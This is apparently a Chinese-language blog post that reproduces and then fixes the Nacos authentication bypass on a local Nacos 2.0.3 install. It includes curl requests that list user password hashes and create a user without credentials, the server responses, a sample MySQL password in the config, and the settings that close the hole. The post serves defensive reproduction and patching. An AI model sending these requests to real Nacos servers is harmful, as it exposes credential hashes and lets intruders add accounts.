[TOC]

漏洞详情

影响版本

• 网上说，影响版本为1.4.1之前版本，但是实际测试为2.0.3也有问题。

问题复现

安装nacos

• 安装nacos-server2.0.3

官方下载地址：
https://github.com/alibaba/nacos/tags/nacos-server-2.0.3.tar.gz

自己搭建的下载地址：
https://install.jishuliu.cn/nacos/nacos-server-2.0.3.tar.gz

• 解压

tar xf nacos-server-2.0.3.tar.gz

• 修改配置文件

把nacos/conf/application.properties的文件内的Connect URL of DB下的内容取消注释并修改为自己的MySQL数据库地址和账号密码，如下：

db.url.0=jdbc:mysql://127.0.0.1:3306/nacos?characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true&useUnicode=true&useSSL=false&serverTimezone=UTC
db.user.0=root
db.password.0=Mysql_pactera.140

• 在数据库内新建nacos数据库并把conf下的nacos-mysql.sql导入到nacos库内

• 启动

sh startup.sh -m standalone

复现问题

• 访问用户列表接口

curl XGET 'http://127.0.0.1:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'

• 可以看到用户名和密码

{
    "totalCount":1,
    "pageNumber":1,
    "pagesAvailable":1,
    "pageItems":[
        {
            "username":"nacos",
            "password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"
        }
    ]
}

• 添加新用户

curl -XPOST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test'

• 可以看到，绕过了鉴权，添加了新用户

{
    "code":200,
    "message":null,
    "data":"create user ok!"
}

解决问题

• 修改配置文件

把nacos/conf/application.properties文件内的nacos.core.auth.enabled改为true
把nacos/conf/application.properties文件内的nacos.core.auth.server.identity.key自定义的key
把nacos/conf/application.properties文件内的nacos.core.auth.server.identity.value改为自定义的value

• 重启nacos

• 重启后再次访问用户列表接口

curl XGET 'http://127.0.0.1:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'

• 可以看到提示报错

{
    "timestamp":"2021-12-30T20:40:45.909+08:00",
    "status":403,
    "error":"Forbidden",
    "message":"unknown user!",
    "path":"/nacos/v1/auth/users/"
}

• 再次添加用户验证

curl -XPOST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test'

• 可以看到提示无权限

{
    "timestamp":"2021-12-30T20:40:54.319+08:00",
    "status":403,
    "error":"Forbidden",
    "message":"authorization failed!",
    "path":"/nacos/v1/auth/users"
}